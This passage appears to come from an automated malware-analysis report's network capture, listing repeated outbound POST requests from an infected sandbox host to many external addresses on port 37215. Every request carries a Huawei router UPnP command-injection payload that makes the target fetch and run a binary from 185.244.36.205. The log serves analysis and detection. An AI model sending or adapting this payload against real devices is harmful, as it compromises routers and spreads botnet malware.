                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1657192.168.2.1545276190.106.1.2137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.647674084 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1658192.168.2.1553246102.170.196.25137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.647722960 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1659192.168.2.155552231.67.229.7437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.647741079 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1660192.168.2.1538320222.107.157.11437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.648027897 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1661192.168.2.1556530222.144.136.19137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.648684978 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1662192.168.2.154566237.14.82.3637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.944144011 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1663192.168.2.155507814.147.98.16637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.944144964 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1664192.168.2.156020641.187.71.13137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.944163084 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1665192.168.2.1540574186.189.184.21637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.944185019 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1666192.168.2.1539448190.39.25.137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.944200993 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1667192.168.2.1542880190.82.11.2037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.944241047 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
